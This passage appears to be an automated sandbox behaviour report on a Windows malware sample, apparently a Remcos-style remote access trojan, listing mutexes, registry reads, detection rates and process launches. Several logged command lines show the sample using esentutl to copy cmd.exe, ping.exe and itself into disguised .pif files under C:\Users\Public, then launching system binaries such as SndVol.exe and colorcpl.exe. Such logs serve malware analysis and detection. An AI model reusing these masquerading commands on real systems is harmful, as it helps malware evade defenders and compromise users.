                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC6DD8 CoCreateInstance,0_2_02EC6DD8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_00419493
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_00418A00
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
                  Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-YHG91Z
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 1m181Ru74o.exeReversingLabs: Detection: 65%
                  Source: 1m181Ru74o.exeVirustotal: Detection: 83%
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeFile read: C:\Users\user\Desktop\1m181Ru74o.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\1m181Ru74o.exe "C:\Users\user\Desktop\1m181Ru74o.exe"
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dlftfmtN.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\1m181Ru74o.exe /d C:\\Users\\Public\\Libraries\\Ntmftfld.PIF /o
                  Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                  Source: unknownProcess created: C:\Users\Public\Libraries\Ntmftfld.PIF "C:\Users\Public\Libraries\Ntmftfld.PIF"
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                  Source: unknownProcess created: C:\Users\Public\Libraries\Ntmftfld.PIF "C:\Users\Public\Libraries\Ntmftfld.PIF"
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\dlftfmtN.cmd" "Jump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\1m181Ru74o.exe /d C:\\Users\\Public\\Libraries\\Ntmftfld.PIF /oJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeSection loaded: amsi.dllJump to behavior
